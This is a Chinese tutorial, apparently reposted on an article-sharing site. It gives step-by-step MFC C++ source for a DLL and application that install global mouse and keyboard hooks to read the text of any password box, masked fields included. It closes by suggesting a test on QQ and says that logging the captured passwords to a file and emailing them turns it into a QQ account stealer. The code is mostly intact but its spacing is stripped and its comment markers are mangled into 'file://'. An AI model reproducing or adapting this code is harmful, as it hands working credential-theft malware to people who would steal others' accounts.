利用鼠标键盘钩子截获密码
时间:2022-11-17 10:27:00
导语:利用鼠标键盘钩子截获密码一文来源于网友上传,不代表本站观点,若需要原创文章可咨询客服老师,欢迎参考。
钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的
钩子分类:
1、WH_CALLWNDPROC和WH_CALLWNDPROCRET:使你可以监视发送到窗口过程的消息
3、WH_DEBUG调试钩子
4、WH_FOREGROUNDIDLE当当应用程序的前台线程大概要变成空闲状态时,系统就会调用WH_FOREGROUNDIDL
5、WH_JOURNALRECORD监视和记录输入事件
6、WH_JOURNALPLAYBACK回放用WH_JOURNALRECORD记录事件
7、WH_KEYBOARD键盘钩子
9、WH_KEYBOARD_LL低层键盘钩子
10、WH_MOUSE鼠标钩子
11、WH_MOUSE_LL底层鼠标钩子
12、WH_SHELL外壳钩子
13、WH_MSGFILTER和WH_SYSMSGFILTER使我们可以监视菜单,滚动条,消息框等
安装钩子:
调用函数SetWindowsHookEx安装钩子。其函数原型为:
HHOOKSetWindowsHookEx(intidHook,HOOKPROClpfn,INSTANCEhMod,DWORDdwThreadId)
idHook表示钩子类型,它是和钩子函数类型一一对应的。如,WH_KEYBOARD,WH_MOUSE。
Lpfn是钩子函数的地址。
HMod是钩子函数所在的实例的句柄。对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。(系统钩子必须在DLL中)
dwThreadId指定钩子所监视的线程的线程号。对于全局钩子,该参数为NULL。
SetWindowsHookEx返回所安装的钩子句柄。
卸载钩子
调用函数BOOLUnhookWindowsHookEx(HHOOKhhk)卸载钩子
定义钩子函数
钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后,系统会调用钩子函数进行处理。一般为下:
LRESULTWINAPIMyHookProc(intnCode,WPARAMwParam,LPARAMlParam)
参数wParam和lParam包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。nCode包含有关消息本身的信,比如是否从消息队列中移出。
实例:
下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。
1,进入向导,新建MFCAppWizard(dll)取名为GetPass,选择MFCExtensionDLL,完成。
2,新建一个CGetPassHook类,基类:CObject,并加入StartHook,StopHook,函数,如下:
classAFX_EXT_CLASSCGetPassHook:publicCObject
{
public:
BOOLStopHook();
BOOLStartHook(HWNDhwnd);
CGetPassHook();
virtual~CGetPassHook();
};
3:加入全局共享数据,如下:
#pragmadata_seg("ShareData")
HHOOKhKeyBoardHook=NULL;file://keyboarhook
HHOOKhMouseHook=NULL;file://mousehook
HINSTANCEglhInstance=NULL;file://globleinstance
HWNDhOutPutWnd=NULL;file://DisplayPassWnd
#pragmadata_seg()
4:加入鼠标,键盘钩子处理函数,如下:
LRESULTWINAPIMouseHookProc(intnCode,WPARAMwParam,LPARAMlParam)
{file://鼠标钩子得理函数
LPMOUSEHOOKSTRUCTlpMouse=(MOUSEHOOKSTRUCTFAR*)lParam;
if(nCode>=0)
{
HWNDhTargetHwnd=lpMouse->hwnd;file://得到鼠标所在窗口句柄
if(hTargetHwnd)
{
LONGstyle=::GetWindowLong(hTargetHwnd,GWL_STYLE);file://得到它的样式
if(style&ES_PASSWORD)file://如果是密码框
{
charszPass[255];
::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);
file://得到密码
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);
file://显示密码
}
}
}
returnCallNextHookEx(hMouseHook,nCode,wParam,lParam);
file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
file://可以起到截儿消息的目的,我们这里调用之。
}
LRESULTWINAPIKeyBoardProc(intnCode,WPARAMwParam,LPARAMlParam)
{file://keyboardhookproc
if(nCode>=0)
{
HWNDhTargetHwnd=GetActiveWindow();file://getactivewindow
if(hTargetHwnd)
EnumChildWindows(hTargetHwnd,EnumWndProc,0);file://枚举所有窗口
}
returnCallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
file://可以起到截儿消息的目的,我们这里调用之。
}
这里要介绍下EnumChildWindows函数,原形如下:
BOOLEnumChildWindows(HWNDhWndParent,WINDENUMPROClpEnumFunc,LPARAMlParam);
hWndParent:为枚举窗口的句柄
lpEnumFunc:枚举函数的地址,
lParam:这里为0
5:加入枚举窗口的函数。如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。
BOOLWINAPIEnumWndProc(HWNDhwnd,LPARAMlParam)
{file://enumthechildwindow,findpassedit
if(hwnd)
{
LONGstyle=::GetWindowLong(hwnd,GWL_STYLE);file://得到STYLE
if(style&ES_PASSWORD)file://是密码框
{
charszPass[255];
::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass);file://得到PASS
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);file://显示
returnTRUE;
}
}
returnTRUE;
}
6:在DEF文件中定义段属性:(这步很重要)
SECTIONS
mydataREADWRITESHARED
7:完成StartHook,StopHook函数,启动/关闭钩子,如下:
BOOLCGetPassHook::StartHook(HWNDhwnd)
{file://installhoook
hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);
file://mousehook
hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);
file://keyboardhook
if(hMouseHook&&hKeyBoardHook)
{
hOutPutWnd=hwnd;file://显示密码的句柄
returnTRUE;
}
returnFALSE;
}
BOOLCGetPassHook::StopHook()
{file://unstallhook
BOOLmHook=UnhookWindowsHookEx(hMouseHook);
BOOLkHook=UnhookWindowsHookEx(hKeyBoardHook);
if(mHook&&kHook)
returnTRUE;
returnFALSE;
}
8:在DLLMAIN函数中得到DLL句柄,要用到glhInstance变量,因此要加入一句,如下:
externHINSTANCEglhInstance;file://记得这里
extern"C"intAPIENTRY
DllMain(HINSTANCEhInstance,DWORDdwReason,LPVOIDlpReserved)
{
UNREFERENCED_PARAMETER(lpReserved);
if(dwReason==DLL_PROCESS_ATTACH)
{
TRACE0("GETPASS.DLLInitializing!\n");
if(!AfxInitExtensionModule(GetPassDLL,hInstance))
return0;
newCDynLinkLibrary(GetPassDLL);
glhInstance=hInstance;file://得到句柄
}
elseif(dwReason==DLL_PROCESS_DETACH)
{
TRACE0("GETPASS.DLLTerminating!\n");
AfxTermExtensionModule(GetPassDLL);
}
return1;//ok
}
9:编译,完成DLL部分,
下面建立APP部分。如下:
1:新建MFCAppWizard(exe)命名为GetPassWord,并在第一步中选择AddtoCurrentWorkSpace加入到当前工作区,这样方便。
2:将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在目录,然后Project->AddtoProject-->Files
选择这两个文件。
2:在主对话框中,加入一个EDIT,ID为IDC_EDIT_PASS
3:在CGetPassWordDlg.h中包含GetPassHook.h文件,声明一个对象。如下:
#include"GetPassHook.h"
classCGetPassWordDlg:publicCDialog
{
protected:
CGetPassHookm_hook;
。。。
DECLARE_MESSAGE_MAP()
};
4:在实现文件中:OnInitDialog()中起动HOOK
BOOLCGetPassWordDlg::OnInitDialog()
{
CWnd*pWnd=GetDlgItem(IDC_EDIT_PASS);
m_hook.StartHook(pWnd->GetSafeHwnd());file://installhook
returnTRUE;//returnTRUEunlessyousetthefocustoacontrol
}
5:加入WM_DESTROY消息,在退出程序时停止HOOK,如下:
voidCGetPassWordDlg::OnDestroy()
{
CDialog::OnDestroy();
m_hook.StopHook();file://stophook
}
6:将GetPass.dll拷贝到。EXE一个目录下,
7:编译,运行.
这样,你在输入任何密码框输入密码时,密码都将截获。就算键盘HOOK失效,移动鼠标到密码框,也都获取*号密码,因为我们安装两个HOOK。启动QQ,输入密码,试下看是否已经截获了密码?将本程序稍做修改,将截获的密码输出到文件,并加入发送邮件攻能,一个QQ盗号器就做成了。